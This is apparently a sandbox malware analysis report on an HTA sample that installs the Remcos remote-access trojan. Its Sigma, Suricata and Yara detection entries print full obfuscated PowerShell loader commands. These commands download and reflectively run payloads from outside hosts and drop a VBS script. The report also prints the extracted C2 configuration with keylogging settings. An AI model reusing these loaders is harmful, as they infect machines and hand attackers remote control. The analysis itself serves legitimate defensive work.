'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", ProcessId: 1672, ProcessName: csc.exe
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1600, TargetFilename: C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" , ProcessId: 2472, ProcessName: wscript.exe
                      Sigma detected: Dynamic CSharp Compile Artefact
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1600, TargetFilename: C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", CommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
                      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd

                      Data Obfuscation

                      barindex
                      Sigma detected: Dot net compiler compiles file from suspicious location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1600, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline", ProcessId: 1672, ProcessName: csc.exe

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 6020, TargetFilename: C:\ProgramData\remcos\logs.dat

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-25T18:50:19.290790+020020204231Exploit Kit Activity Detected104.168.32.14880192.168.2.549708TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-25T18:50:19.290790+020020204251Exploit Kit Activity Detected104.168.32.14880192.168.2.549708TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-25T18:49:56.463614+020020365941Malware Command and Control Activity Detected192.168.2.54972345.134.140.7050312TCP
                      2024-09-25T18:50:41.546804+020020365941Malware Command and Control Activity Detected192.168.2.54971145.134.140.7050312TCP
                      2024-09-25T18:51:03.935894+020020365941Malware Command and Control Activity Detected192.168.2.54971345.134.140.7050312TCP
                      2024-09-25T18:51:26.329688+020020365941Malware Command and Control Activity Detected192.168.2.54971545.134.140.7050312TCP
                      2024-09-25T18:51:48.885817+020020365941Malware Command and Control Activity Detected192.168.2.54971645.134.140.7050312TCP
                      2024-09-25T18:52:11.300191+020020365941Malware Command and Control Activity Detected192.168.2.54971745.134.140.7050312TCP
                      2024-09-25T18:52:33.741698+020020365941Malware Command and Control Activity Detected192.168.2.54971845.134.140.7050312TCP
                      2024-09-25T18:52:56.235749+020020365941Malware Command and Control Activity Detected192.168.2.54971945.134.140.7050312TCP
                      2024-09-25T18:53:18.658908+020020365941Malware Command and Control Activity Detected192.168.2.54972045.134.140.7050312TCP
                      2024-09-25T18:53:41.236809+020020365941Malware Command and Control Activity Detected192.168.2.54972145.134.140.7050312TCP
                      2024-09-25T18:54:03.773321+020020365941Malware Command and Control Activity Detected192.168.2.54972245.134.140.7050312TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFAvira URL Cloud: Label: malware
                      Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtAvira URL Cloud: Label: malware
                      Source: ramcxx.duckdns.orgAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "ramcxx.duckdns.org:50312:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-M3P7YT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Multi AV Scanner detection for submitted file
                      Source: LJ1IZDkHyE.htaReversingLabs: Detection: 26%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004338C8
                      Source: powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_6e2816b5-4

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR

                      Privilege Escalation

                      barindex
